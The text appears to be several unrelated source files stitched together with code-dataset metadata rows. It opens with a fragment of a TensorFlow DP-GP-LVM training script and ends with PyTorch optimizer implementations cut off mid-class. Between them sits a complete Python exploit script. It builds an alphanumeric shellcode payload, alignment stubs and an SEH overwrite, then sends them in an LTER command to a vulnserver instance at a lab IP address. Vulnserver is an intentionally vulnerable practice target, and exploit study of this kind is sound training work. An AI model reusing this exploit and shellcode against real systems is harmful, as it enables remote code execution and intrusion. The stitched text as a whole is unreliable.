x_u=inducing_input, x_mean=x_mean, x_covar=x_covar, train_opt_time=train_opt_time,
final_cost=final_cost)
if not isfile(gpdp_results_file):
# Reset default graph before building new model graph. This speeds up script.
tf.reset_default_graph()
np.random.seed(1) # Random seed.
# Define instance of DP-GP-LVM. DP mask is default to 1.
model = dp_gp_lvm(y_train=y_train,
num_inducing_points=num_inducing_points,
num_latent_dims=num_latent_dimensions,
truncation_level=truncation_level)
model_training_objective = model.objective
# Optimisation.
model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
loss=model_training_objective)
with tf.Session() as s:
# Initialise variables.
s.run(tf.global_variables_initializer())
# Training optimisation loop.
start_time = time()
print('\nTraining DP-GP-LVM:')
for c in range(train_iter):
s.run(model_opt_train)
if (c % 100) == 0:
print(' DP-GP-LVM opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
end_time = time()
train_opt_time = end_time - start_time
final_cost = s.run(model_training_objective)
print('Final iter {:5}:'.format(c))
print(' DP-GP-LVM: {}'.format(final_cost))
print('Time to optimise: {} s'.format(train_opt_time))
# Get converged values as numpy arrays.
ard_weights, noise_precision, signal_variance, inducing_input, assignments = \
s.run(
(model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input,
model.assignments))
x_mean, x_covar = s.run(model.q_x)
w_1, w_2 = s.run(model.dp.q_alpha)
gamma_atoms, alpha_atoms, beta_atoms = s.run(model.dp_atoms)
# Save results.
print('\nSaving results to .npz file.')
np.savez(gpdp_results_file, original_data=seven_groups_images, y_train=y_train,
ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
x_u=inducing_input, assignments=assignments, x_mean=x_mean, x_covar=x_covar,
gamma_atoms=gamma_atoms, alpha_atoms=alpha_atoms, beta_atoms=beta_atoms,
q_alpha_w1=w_1, q_alpha_w2=w_2, train_opt_time=train_opt_time, final_cost=final_cost)
| 55.819773 | 120 | 0.550783 | 6,060 | 54,201 | 4.610066 | 0.044554 | 0.013459 | 0.025772 | 0.020045 | 0.953825 | 0.939041 | 0.936572 | 0.932491 | 0.925189 | 0.918603 | 0 | 0.014814 | 0.367318 | 54,201 | 970 | 121 | 55.87732 | 0.799866 | 0.182284 | 0 | 0.819967 | 0 | 0 | 0.06764 | 0.007763 | 0 | 0 | 0 | 0 | 0.013093 | 1 | 0 | false | 0 | 0.021277 | 0 | 0.021277 | 0.144026 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7ad7865a65da4f7694f18fff8566ec178cdedf63 | 4,141 | py | Python | vulnserver_lter_seh.py | timip/explo | 0697a34f100f4cf543c73e7d190254724ced543a | [
"Apache-2.0"
] | 41 | 2018-05-21T02:56:01.000Z | 2022-03-22T03:57:33.000Z | vulnserver_lter_seh.py | timip/explo | 0697a34f100f4cf543c73e7d190254724ced543a | [
"Apache-2.0"
] | null | null | null | vulnserver_lter_seh.py | timip/explo | 0697a34f100f4cf543c73e7d190254724ced543a | [
"Apache-2.0"
] | 22 | 2019-01-29T18:42:03.000Z | 2021-11-02T21:11:13.000Z | #!/usr/bin/python
import socket
import os
import sys
buf = ""
buf += "\x53\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x79\x6c\x6b\x58\x4c\x42\x53\x30\x47\x70\x47\x70\x73"
buf += "\x50\x4c\x49\x39\x75\x46\x51\x69\x50\x71\x74\x4c\x4b"
buf += "\x32\x70\x74\x70\x4c\x4b\x66\x32\x46\x6c\x4e\x6b\x33"
buf += "\x62\x45\x44\x6c\x4b\x74\x32\x66\x48\x74\x4f\x68\x37"
buf += "\x43\x7a\x44\x66\x65\x61\x39\x6f\x4c\x6c\x35\x6c\x75"
buf += "\x31\x33\x4c\x75\x52\x54\x6c\x51\x30\x69\x51\x38\x4f"
buf += "\x46\x6d\x56\x61\x39\x57\x5a\x42\x58\x72\x72\x72\x46"
buf += "\x37\x4e\x6b\x76\x32\x42\x30\x6e\x6b\x30\x4a\x57\x4c"
buf += "\x6e\x6b\x72\x6c\x66\x71\x53\x48\x4a\x43\x63\x78\x75"
buf += "\x51\x6e\x31\x62\x71\x4c\x4b\x56\x39\x67\x50\x55\x51"
buf += "\x49\x43\x6e\x6b\x52\x69\x35\x48\x49\x73\x54\x7a\x71"
buf += "\x59\x4e\x6b\x74\x74\x6c\x4b\x46\x61\x6b\x66\x54\x71"
buf += "\x49\x6f\x6c\x6c\x6f\x31\x68\x4f\x34\x4d\x46\x61\x58"
buf += "\x47\x56\x58\x39\x70\x52\x55\x58\x76\x64\x43\x71\x6d"
buf += "\x6a\x58\x77\x4b\x51\x6d\x66\x44\x71\x65\x79\x74\x31"
buf += "\x48\x4e\x6b\x61\x48\x54\x64\x63\x31\x4e\x33\x33\x56"
buf += "\x6e\x6b\x66\x6c\x52\x6b\x6c\x4b\x71\x48\x35\x4c\x47"
buf += "\x71\x6a\x73\x4c\x4b\x35\x54\x4c\x4b\x37\x71\x7a\x70"
buf += "\x4b\x39\x43\x74\x64\x64\x57\x54\x33\x6b\x71\x4b\x51"
buf += "\x71\x62\x79\x52\x7a\x46\x31\x4b\x4f\x4b\x50\x51\x4f"
buf += "\x73\x6f\x51\x4a\x4c\x4b\x45\x42\x6a\x4b\x4c\x4d\x61"
buf += "\x4d\x71\x78\x46\x53\x35\x62\x37\x70\x35\x50\x30\x68"
buf += "\x50\x77\x73\x43\x76\x52\x63\x6f\x46\x34\x42\x48\x42"
buf += "\x6c\x32\x57\x71\x36\x47\x77\x6b\x4f\x79\x45\x58\x38"
buf += "\x4e\x70\x55\x51\x63\x30\x53\x30\x77\x59\x4a\x64\x71"
buf += "\x44\x56\x30\x43\x58\x65\x79\x6d\x50\x42\x4b\x55\x50"
buf += "\x39\x6f\x4a\x75\x76\x30\x76\x30\x30\x50\x50\x50\x63"
buf += "\x70\x62\x70\x33\x70\x50\x50\x75\x38\x49\x7a\x76\x6f"
buf += "\x4b\x6f\x4b\x50\x49\x6f\x78\x55\x4e\x77\x61\x7a\x34"
buf += "\x45\x31\x78\x4f\x30\x4f\x58\x69\x4e\x4c\x45\x52\x48"
buf += "\x33\x32\x35\x50\x77\x61\x33\x6c\x4c\x49\x7a\x46\x71"
buf += "\x7a\x76\x70\x66\x36\x52\x77\x63\x58\x6a\x39\x4e\x45"
buf += "\x31\x64\x51\x71\x49\x6f\x79\x45\x6c\x45\x79\x50\x34"
buf += "\x34\x54\x4c\x79\x6f\x30\x4e\x64\x48\x51\x65\x58\x6c"
buf += "\x32\x48\x6a\x50\x4c\x75\x6e\x42\x50\x56\x79\x6f\x59"
buf += "\x45\x75\x38\x53\x53\x42\x4d\x72\x44\x37\x70\x6b\x39"
buf += "\x4d\x33\x62\x77\x32\x77\x33\x67\x56\x51\x39\x66\x73"
buf += "\x5a\x42\x32\x73\x69\x71\x46\x68\x62\x49\x6d\x71\x76"
buf += "\x6a\x67\x57\x34\x45\x74\x67\x4c\x47\x71\x45\x51\x4e"
buf += "\x6d\x37\x34\x46\x44\x66\x70\x79\x56\x57\x70\x47\x34"
buf += "\x53\x64\x36\x30\x76\x36\x70\x56\x46\x36\x42\x66\x36"
buf += "\x36\x32\x6e\x53\x66\x46\x36\x31\x43\x66\x36\x53\x58"
buf += "\x70\x79\x68\x4c\x77\x4f\x4e\x66\x39\x6f\x7a\x75\x6f"
buf += "\x79\x39\x70\x32\x6e\x73\x66\x33\x76\x6b\x4f\x74\x70"
buf += "\x61\x78\x44\x48\x4d\x57\x37\x6d\x61\x70\x59\x6f\x79"
buf += "\x45\x4f\x4b\x58\x70\x4f\x45\x69\x32\x56\x36\x55\x38"
buf += "\x59\x36\x4d\x45\x6f\x4d\x4f\x6d\x59\x6f\x69\x45\x35"
buf += "\x6c\x35\x56\x53\x4c\x76\x6a\x6f\x70\x39\x6b\x79\x70"
buf += "\x61\x65\x67\x75\x6d\x6b\x77\x37\x62\x33\x30\x72\x32"
buf += "\x4f\x51\x7a\x47\x70\x73\x63\x6b\x4f\x49\x45\x41\x41"
align_esp = "\x5b\x5f\x5c"
zero_eax = "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A"
align_ebx = zero_eax + "\x2D\x55\x55\x55\x5E\x2D\x55\x55\x55\x5E\x2D\x56\x55\x56\x5F" + "\x50"
align_ebx += zero_eax + "\x2D\x2A\x69\x5C\x54\x2D\x2A\x69\x5C\x54\x2D\x2B\x6A\x5C\x54" + "\x50"
magic = align_esp + align_ebx
print "magic length = " + str(len(magic))
buffer = "." + buf + "A" * (3518 - 126 - len(buf)) + magic + "\x46" * (126 - len(magic)) + "\x73\xffBB" + "\x2b\x17\x50\x62" + "D" * (5000 - 3522 - 4)
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("192.168.222.129", 9999))
print expl.recv(1024)
expl.send("LTER " + buffer + "\r\n")
print expl.recv(1024)
expl.send('EXIT\r\n')
expl.close()
print buffer
| 49.891566 | 151 | 0.671577 | 895 | 4,141 | 3.096089 | 0.130726 | 0.030314 | 0.038975 | 0.043306 | 0.070011 | 0.053771 | 0.011909 | 0.011909 | 0.011909 | 0.011909 | 0 | 0.349251 | 0.064477 | 4,141 | 82 | 152 | 50.5 | 0.36603 | 0.003864 | 0 | 0.027397 | 0 | 0.767123 | 0.743938 | 0.71969 | 0.013699 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0.041096 | null | null | 0.054795 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bb0b8ebf4ff4237cdef87eef1cd2498a5d1dfce7 | 31,077 | py | Python | utils/optim.py | tetelias/openeds | 0f77febc947644352aa57b65a9b56237daff39c7 | [
"MIT"
] | 3 | 2020-06-10T11:47:10.000Z | 2021-08-21T23:36:44.000Z | utils/optim.py | tetelias/openeds | 0f77febc947644352aa57b65a9b56237daff39c7 | [
"MIT"
] | null | null | null | utils/optim.py | tetelias/openeds | 0f77febc947644352aa57b65a9b56237daff39c7 | [
"MIT"
] | 1 | 2020-08-21T02:37:59.000Z | 2020-08-21T02:37:59.000Z | import itertools as it
import math
import torch
from torch.optim.optimizer import Optimizer
class AdaBound(Optimizer):
"""Implements AdaBound algorithm.
It has been proposed in `Adaptive Gradient Methods with Dynamic Bound of Learning Rate`_.
Arguments:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): Adam learning rate (default: 1e-3)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square (default: (0.9, 0.999))
final_lr (float, optional): final (SGD) learning rate (default: 0.1)
gamma (float, optional): convergence speed of the bound functions (default: 1e-3)
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
amsbound (boolean, optional): whether to use the AMSBound variant of this algorithm
.. Adaptive Gradient Methods with Dynamic Bound of Learning Rate:
https://openreview.net/forum?id=Bkg3g2R9FX
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), final_lr=0.1, gamma=1e-3,
eps=1e-8, weight_decay=0, amsbound=False):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
if not 0.0 <= final_lr:
raise ValueError("Invalid final learning rate: {}".format(final_lr))
if not 0.0 <= gamma < 1.0:
raise ValueError("Invalid gamma parameter: {}".format(gamma))
defaults = dict(lr=lr, betas=betas, final_lr=final_lr, gamma=gamma, eps=eps,
weight_decay=weight_decay, amsbound=amsbound)
super(AdaBound, self).__init__(params, defaults)
self.base_lrs = list(map(lambda group: group['lr'], self.param_groups))
def __setstate__(self, state):
super(AdaBound, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('amsbound', False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group, base_lr in zip(self.param_groups, self.base_lrs):
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError(
'Adam does not support sparse gradients, please consider SparseAdam instead')
amsbound = group['amsbound']
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(p.data)
if amsbound:
# Maintains max of all exp. moving avg. of sq. grad. values
state['max_exp_avg_sq'] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
if amsbound:
max_exp_avg_sq = state['max_exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
if group['weight_decay'] != 0:
grad = grad.add(group['weight_decay'], p.data)
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
if amsbound:
# Maintains the maximum of all 2nd moment running avg. till now
torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
# Use the max. for normalizing running avg. of gradient
denom = max_exp_avg_sq.sqrt().add_(group['eps'])
else:
denom = exp_avg_sq.sqrt().add_(group['eps'])
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1
# Applies bounds on actual learning rate
# lr_scheduler cannot affect final_lr, this is a workaround to apply lr decay
final_lr = group['final_lr'] * group['lr'] / base_lr
lower_bound = final_lr * (1 - 1 / (group['gamma'] * state['step'] + 1))
upper_bound = final_lr * (1 + 1 / (group['gamma'] * state['step']))
step_size = torch.full_like(denom, step_size)
step_size.div_(denom).clamp_(lower_bound, upper_bound).mul_(exp_avg)
p.data.add_(-step_size)
return loss
class AdaBoundW(Optimizer):
"""Implements AdaBound algorithm with Decoupled Weight Decay (arxiv.org/abs/1711.05101)
It has been proposed in `Adaptive Gradient Methods with Dynamic Bound of Learning Rate`_.
Arguments:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): Adam learning rate (default: 1e-3)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square (default: (0.9, 0.999))
final_lr (float, optional): final (SGD) learning rate (default: 0.1)
gamma (float, optional): convergence speed of the bound functions (default: 1e-3)
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
amsbound (boolean, optional): whether to use the AMSBound variant of this algorithm
.. Adaptive Gradient Methods with Dynamic Bound of Learning Rate:
https://openreview.net/forum?id=Bkg3g2R9FX
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), final_lr=0.1, gamma=1e-3,
eps=1e-8, weight_decay=0, amsbound=False):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
if not 0.0 <= final_lr:
raise ValueError("Invalid final learning rate: {}".format(final_lr))
if not 0.0 <= gamma < 1.0:
raise ValueError("Invalid gamma parameter: {}".format(gamma))
defaults = dict(lr=lr, betas=betas, final_lr=final_lr, gamma=gamma, eps=eps,
weight_decay=weight_decay, amsbound=amsbound)
super(AdaBoundW, self).__init__(params, defaults)
self.base_lrs = list(map(lambda group: group['lr'], self.param_groups))
def __setstate__(self, state):
super(AdaBoundW, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('amsbound', False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group, base_lr in zip(self.param_groups, self.base_lrs):
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError(
'Adam does not support sparse gradients, please consider SparseAdam instead')
amsbound = group['amsbound']
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(p.data)
if amsbound:
# Maintains max of all exp. moving avg. of sq. grad. values
state['max_exp_avg_sq'] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
if amsbound:
max_exp_avg_sq = state['max_exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
if amsbound:
# Maintains the maximum of all 2nd moment running avg. till now
torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
# Use the max. for normalizing running avg. of gradient
denom = max_exp_avg_sq.sqrt().add_(group['eps'])
else:
denom = exp_avg_sq.sqrt().add_(group['eps'])
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1
# Applies bounds on actual learning rate
# lr_scheduler cannot affect final_lr, this is a workaround to apply lr decay
final_lr = group['final_lr'] * group['lr'] / base_lr
lower_bound = final_lr * (1 - 1 / (group['gamma'] * state['step'] + 1))
upper_bound = final_lr * (1 + 1 / (group['gamma'] * state['step']))
step_size = torch.full_like(denom, step_size)
step_size.div_(denom).clamp_(lower_bound, upper_bound).mul_(exp_avg)
if group['weight_decay'] != 0:
decayed_weights = torch.mul(p.data, group['weight_decay'])
p.data.add_(-step_size)
p.data.sub_(decayed_weights)
else:
p.data.add_(-step_size)
return loss
class AdamW(Optimizer):
r"""Implements AdamW algorithm.
The original Adam algorithm was proposed in `Adam: A Method for Stochastic Optimization`_.
The AdamW variant was proposed in `Decoupled Weight Decay Regularization`_.
Arguments:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): learning rate (default: 1e-3)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square (default: (0.9, 0.999))
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay coefficient (default: 1e-2)
amsgrad (boolean, optional): whether to use the AMSGrad variant of this
algorithm from the paper `On the Convergence of Adam and Beyond`_
(default: False)
.. _Adam\: A Method for Stochastic Optimization:
https://arxiv.org/abs/1412.6980
.. _Decoupled Weight Decay Regularization:
https://arxiv.org/abs/1711.05101
.. _On the Convergence of Adam and Beyond:
https://openreview.net/forum?id=ryQu7f-RZ
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8,
weight_decay=1e-2, amsgrad=False):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
defaults = dict(lr=lr, betas=betas, eps=eps,
weight_decay=weight_decay, amsgrad=amsgrad)
super(AdamW, self).__init__(params, defaults)
def __setstate__(self, state):
super(AdamW, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('amsgrad', False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
# Perform stepweight decay
p.data.mul_(1 - group['lr'] * group['weight_decay'])
# Perform optimization step
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('Adam does not support sparse gradients, please consider SparseAdam instead')
amsgrad = group['amsgrad']
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(p.data)
if amsgrad:
# Maintains max of all exp. moving avg. of sq. grad. values
state['max_exp_avg_sq'] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
if amsgrad:
max_exp_avg_sq = state['max_exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
if amsgrad:
# Maintains the maximum of all 2nd moment running avg. till now
torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
# Use the max. for normalizing running avg. of gradient
denom = max_exp_avg_sq.sqrt().add_(group['eps'])
else:
denom = exp_avg_sq.sqrt().add_(group['eps'])
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1
p.data.addcdiv_(-step_size, exp_avg, denom)
return loss
class Lookahead(Optimizer):
def __init__(self, base_optimizer,alpha=0.5, k=6):
if not 0.0 <= alpha <= 1.0:
raise ValueError(f'Invalid slow update rate: {alpha}')
if not 1 <= k:
raise ValueError(f'Invalid lookahead steps: {k}')
self.optimizer = base_optimizer
self.param_groups = self.optimizer.param_groups
self.alpha = alpha
self.k = k
for group in self.param_groups:
group["step_counter"] = 0
self.slow_weights = [[p.clone().detach() for p in group['params']]
for group in self.param_groups]
for w in it.chain(*self.slow_weights):
w.requires_grad = False
def step(self, closure=None):
loss = None
if closure is not None:
loss = closure()
loss = self.optimizer.step()
for group,slow_weights in zip(self.param_groups,self.slow_weights):
group['step_counter'] += 1
if group['step_counter'] % self.k != 0:
continue
for p,q in zip(group['params'],slow_weights):
if p.grad is None:
continue
q.data.add_(self.alpha,p.data - q.data)
p.data.copy_(q.data)
return loss
# Lookahead implementation from https://github.com/lonePatient/lookahead_pytorch/blob/master/optimizer.py
# RAdam + LARS implementation from https://gist.github.com/redknightlois/c4023d393eb8f92bb44b2ab582d7ec20
# RAdam + LARS + LookAHead
class Over9000(Optimizer):
def __init__(self, params, lr=1e-3, alpha=0.5, k=6, betas=(0.9, 0.999), eps=1e-8, weight_decay=0):
#parameter checks
if not 0.0 <= alpha <= 1.0:
raise ValueError(f'Invalid slow update rate: {alpha}')
if not 1 <= k:
raise ValueError(f'Invalid lookahead steps: {k}')
if not lr > 0:
raise ValueError(f'Invalid Learning Rate: {lr}')
if not eps > 0:
raise ValueError(f'Invalid eps: {eps}')
defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay)
self.buffer = [[None, None, None] for ind in range(10)]
super(Over9000, self).__init__(params, defaults)
# look ahear params
for group in self.param_groups:
group["step_counter"] = 0
self.alpha = alpha
self.k = k
#lookahead weights
self.slow_weights = [[p.clone().detach() for p in group['params']]
for group in self.param_groups]
#don't use grad for lookahead weights
for w in it.chain(*self.slow_weights):
w.requires_grad = False
def __setstate__(self, state):
super(Over9000, self).__setstate__(state)
def step(self, closure=None):
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data.float()
if grad.is_sparse:
raise RuntimeError('Ralamb does not support sparse gradients')
p_data_fp32 = p.data.float()
state = self.state[p]
if len(state) == 0:
state['step'] = 0
state['exp_avg'] = torch.zeros_like(p_data_fp32)
state['exp_avg_sq'] = torch.zeros_like(p_data_fp32)
else:
state['exp_avg'] = state['exp_avg'].type_as(p_data_fp32)
state['exp_avg_sq'] = state['exp_avg_sq'].type_as(p_data_fp32)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
beta1, beta2 = group['betas']
# Decay the first and second moment running average coefficient
# m_t
exp_avg.mul_(beta1).add_(1 - beta1, grad)
# v_t
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
state['step'] += 1
buffered = self.buffer[int(state['step'] % 10)]
if state['step'] == buffered[0]:
N_sma, radam_step = buffered[1], buffered[2]
else:
buffered[0] = state['step']
beta2_t = beta2 ** state['step']
N_sma_max = 2 / (1 - beta2) - 1
N_sma = N_sma_max - 2 * state['step'] * beta2_t / (1 - beta2_t)
buffered[1] = N_sma
# more conservative since it's an approximated value
if N_sma >= 5:
radam_step = group['lr'] * math.sqrt((1 - beta2_t) * (N_sma - 4) / (N_sma_max - 4) * (N_sma - 2) / N_sma * N_sma_max / (N_sma_max - 2)) / (1 - beta1 ** state['step'])
else:
radam_step = group['lr'] / (1 - beta1 ** state['step'])
buffered[2] = radam_step
if group['weight_decay'] != 0:
p_data_fp32.add_(-group['weight_decay'] * group['lr'], p_data_fp32)
weight_norm = p.data.pow(2).sum().sqrt().clamp(0, 10)
radam_norm = p_data_fp32.pow(2).sum().sqrt()
if weight_norm == 0 or radam_norm == 0:
trust_ratio = 1
else:
trust_ratio = weight_norm / radam_norm
state['weight_norm'] = weight_norm
state['adam_norm'] = radam_norm
state['trust_ratio'] = trust_ratio
# more conservative since it's an approximated value
if N_sma >= 5:
denom = exp_avg_sq.sqrt().add_(group['eps'])
p_data_fp32.addcdiv_(-radam_step * trust_ratio, exp_avg, denom)
else:
p_data_fp32.add_(-radam_step * trust_ratio, exp_avg)
p.data.copy_(p_data_fp32)
#---------------- end radam step
#look ahead tracking and updating if latest batch = k
for group,slow_weights in zip(self.param_groups,self.slow_weights):
group['step_counter'] += 1
if group['step_counter'] % self.k != 0:
continue
for p,q in zip(group['params'],slow_weights):
if p.grad is None:
continue
q.data.add_(self.alpha,p.data - q.data)
p.data.copy_(q.data)
return loss
class RAdam(torch.optim.Optimizer):
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0):
defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay)
self.buffer = [[None, None, None] for ind in range(10)]
super(RAdam, self).__init__(params, defaults)
def __setstate__(self, state):
super(RAdam, self).__setstate__(state)
def step(self, closure=None):
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data.float()
if grad.is_sparse:
raise RuntimeError('RAdam does not support sparse gradients')
p_data_fp32 = p.data.float()
state = self.state[p]
if len(state) == 0:
state['step'] = 0
state['exp_avg'] = torch.zeros_like(p_data_fp32)
state['exp_avg_sq'] = torch.zeros_like(p_data_fp32)
else:
state['exp_avg'] = state['exp_avg'].type_as(p_data_fp32)
state['exp_avg_sq'] = state['exp_avg_sq'].type_as(p_data_fp32)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
beta1, beta2 = group['betas']
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
exp_avg.mul_(beta1).add_(1 - beta1, grad)
state['step'] += 1
buffered = self.buffer[int(state['step'] % 10)]
if state['step'] == buffered[0]:
N_sma, step_size = buffered[1], buffered[2]
else:
buffered[0] = state['step']
beta2_t = beta2 ** state['step']
N_sma_max = 2 / (1 - beta2) - 1
N_sma = N_sma_max - 2 * state['step'] * beta2_t / (1 - beta2_t)
buffered[1] = N_sma
# more conservative since it's an approximated value
if N_sma >= 5:
step_size = group['lr'] * math.sqrt((1 - beta2_t) * (N_sma - 4) / (N_sma_max - 4) * (N_sma - 2) / N_sma * N_sma_max / (N_sma_max - 2)) / (1 - beta1 ** state['step'])
else:
step_size = group['lr'] / (1 - beta1 ** state['step'])
buffered[2] = step_size
if group['weight_decay'] != 0:
p_data_fp32.add_(-group['weight_decay'] * group['lr'], p_data_fp32)
# more conservative since it's an approximated value
if N_sma >= 5:
denom = exp_avg_sq.sqrt().add_(group['eps'])
p_data_fp32.addcdiv_(-step_size, exp_avg, denom)
else:
p_data_fp32.add_(-step_size, exp_avg)
p.data.copy_(p_data_fp32)
return loss
import math
import torch
from torch.optim.optimizer import Optimizer, required
import itertools as it
#from torch.optim import Optimizer
#credit - Lookahead implementation from LonePatient - https://github.com/lonePatient/lookahead_pytorch/blob/master/optimizer.py
#credit2 - RAdam code by https://github.com/LiyuanLucasLiu/RAdam/blob/master/radam.py
class Ranger(Optimizer):
def __init__(self, params, lr=1e-3, alpha=0.5, k=6, betas=(.9,0.999), eps=1e-8, weight_decay=0):
#parameter checks
if not 0.0 <= alpha <= 1.0:
raise ValueError(f'Invalid slow update rate: {alpha}')
if not 1 <= k:
raise ValueError(f'Invalid lookahead steps: {k}')
if not lr > 0:
raise ValueError(f'Invalid Learning Rate: {lr}')
if not eps > 0:
raise ValueError(f'Invalid eps: {eps}')
#prep defaults and init torch.optim base
defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay)
